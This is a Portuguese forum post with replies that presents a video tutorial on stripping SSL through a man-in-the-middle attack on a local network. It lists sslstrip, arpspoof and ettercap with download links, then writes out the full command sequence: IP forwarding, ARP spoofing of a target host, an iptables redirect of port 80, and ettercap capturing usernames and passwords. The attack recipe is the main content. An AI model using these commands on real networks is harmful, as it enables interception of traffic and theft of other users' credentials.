Nesta video vou mostrar como a
criptografia SSL não e seguro. Foi feita um Homem-no-meio (
Man In The Middle), redirecionei todo trafico da rede (porta 80), para uma outra porta onde meu micro escutava. O
sniffer de SSL (
sslstrip), fica escutando na porta e remove o
SSL para que não possa voltar para o usuário. O
ettercap que executei em "modo texto" só captura o
Usuário(username ) e
Senha(password).
rogramas usados:[LIST=1]
- sslstrip (http://"http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.2.tar.gz")
- arpspoof (http://"http://www.monkey.org/%7Edugsong/dsniff/dsniff-2.3.tar.gz")
- ettercap (http://"http://prdownloads.sourceforge.net/ettercap/ettercap-NG-0.7.3.tar.gz?download")
Comando usados:Quotekate /etc/etter.conf
* Descemente a opção do iptables, tirando o "#"
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 10.1.1.6 10.1.1.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
ettercap -T -q -i wlan0
sslstrip -a -k -f
ettercap -T -q -i eth0
OBS: Se sua internet for wireless no lugar de "
eth0" coloca-se "
wlan0"
Todas os programas são encontrados no backtrack 4
Download da video:Quotehttp://www.4shared.com/file/9Np1dj7m/Sniffer_SSL.html (http://www.4shared.com/file/9Np1dj7m/Sniffer_SSL.html)
Assista on-line:
Quotehttp://blip.tv/file/3525086 (http://blip.tv/file/3525086)
Muito boa a informação ;)
Vlw
Obs.:O link dos softwares usados não estão funcionando =)
Se tira o excesso de http rsrs, alguma configuração do forum.
Legal o vídeo, eu também criei 3 vídeos com o mesmo tema:
http://www.youtube.com/playlist?list=PLA3B83F424F9DFCD2 (http://www.youtube.com/playlist?list=PLA3B83F424F9DFCD2)
[]s!